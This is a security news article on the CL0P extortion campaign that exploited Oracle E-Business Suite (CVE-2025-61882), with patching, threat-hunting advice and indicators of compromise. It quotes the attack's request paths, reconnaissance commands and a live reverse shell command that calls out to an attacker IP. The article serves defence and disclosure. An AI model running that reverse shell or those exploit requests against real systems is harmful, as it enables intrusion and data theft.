Organizations using Oracle E-Business Suite must apply the October 4 emergency patches immediately to mitigate active, in-the-wild exploitation by CL0P extortion actors and hunt for malicious templates in their databases.
Beginning September 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant identified a massive email campaign targeting executives at dozens of organizations, alleging theft of sensitive data from Oracle E-Business Suite (EBS) environments.
The extortion messages, sent from hundreds of compromised third-party accounts, included legitimate file listings dating back to mid-August. Although no victims have yet appeared on the CL0P DLS, past campaigns suggest data may be published several weeks after the initial outreach.
On October 2, Oracle reported that exploited vulnerabilities had been patched in July’s Critical Patch Update and urged customers to apply the latest CPU immediately.
Two days later, Oracle released emergency fixes specifically addressing CVE-2025-61882 and reiterated the need to stay current on all patches.
Multi-Stage Java Implant Framework
GTIG’s analysis attributes the campaign to a CL0P actor leveraging months of intrusion activity. Initial exploitation may have begun as early as July 10, but by August 9, a zero-day vulnerability—CVE-2025-61882—was in active use against UiServlet and SyncServlet components.
The multi-stage Java implant framework combines Server-Side Request Forgery, CRLF injection, authentication bypass, and XSL template injection to achieve remote code execution.
In August, attackers exploited SyncServlet via:
textPOST /OA_HTML/SyncServlet
They then abused the XDO Template Manager to upload malicious XSL payloads to the XDO_TEMPLATES_B table. A template preview request such as:
text/OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG
&TemplateCode=TMP|DEF<16_RANDOM_HEX>&TemplateType=XSL-TEXT
triggers payload execution. The XSL payload decodes a Base64 Java implant, instantiates a ScriptEngine, and evaluates attacker-controlled code.
Examples of commands executed under the “applmgr” account include system reconnaissance (cat /etc/fstab, df -h, ip addr) and reverse shell connections:
textbash -i >& /dev/tcp/200.107.207.26/53 0>&1
Two distinct Java chains—GOLDVEIN.JAVA downloader and a nested SAGE* reflective loader sequence culminating in SAGEWAVE—enable second-stage payload retrieval and persistent filter installation.
Review entries where TEMPLATE_CODE begins with “TMP” or “DEF.” Restrict outbound Internet access from EBS servers to block C2 communications.
Actionable Guidance
The critical first step is immediate patching: apply Oracle October 4 emergency patches for CVE-2025-61882 without delay. Following patch deployment, defenders should hunt for malicious templates:
Review entries where TEMPLATE_CODE begins with “TMP” or “DEF.” Restrict outbound Internet access from EBS servers to block C2 communications.
This campaign underscores the strategic advantage of coupling zero-day exploitation with delayed extortion. By targeting public-facing enterprise applications, CL0P-affiliated actors can rapidly exfiltrate data at scale while evading early detection.
Monitor network logs for anomalous requests to /OA_HTML/configurator/UiServlet and the TemplatePreviewPG endpoint. Leverage memory forensics on Java processes to detect in-memory implants not visible on disk.
Given their history of leveraging zero-days through 2020–2025, organizations must assume they remain prime targets and maintain rigorous patch and monitoring regimes.
Indicators of Compromise
| Type | Indicator | Description |
|---|---|---|
| Network | 200.107.207.26 | IP address observed in exploitation attempts targeting UiServlet and SyncServlet components. |
| Network | 161.97.99.49 | IP address observed in exploitation attempts targeting the UiServlet component. |
| Network | 162.55.17.215:443 | GOLDVEIN.JAVA C2 |
| Network | 104.194.11.200:443 | GOLDVEIN.JAVA C2 |
| Network | /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG… | Indicator of an attempt to trigger the malicious XSL payload. Look for requests where TemplateCode begins with TMP or DEF. |
| Network | /OA_HTML/configurator/UiServlet | Endpoint targeted in the July 2025 exploitation activity. |
| Network | /OA_HTML/SyncServlet | Endpoint targeted in the August 2025 exploitation activity. |
| Network | /help/state/content/destination./navId.1/navvSetId.iHelp/ | HTTP path substring filtered for by SAGEWAVE |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
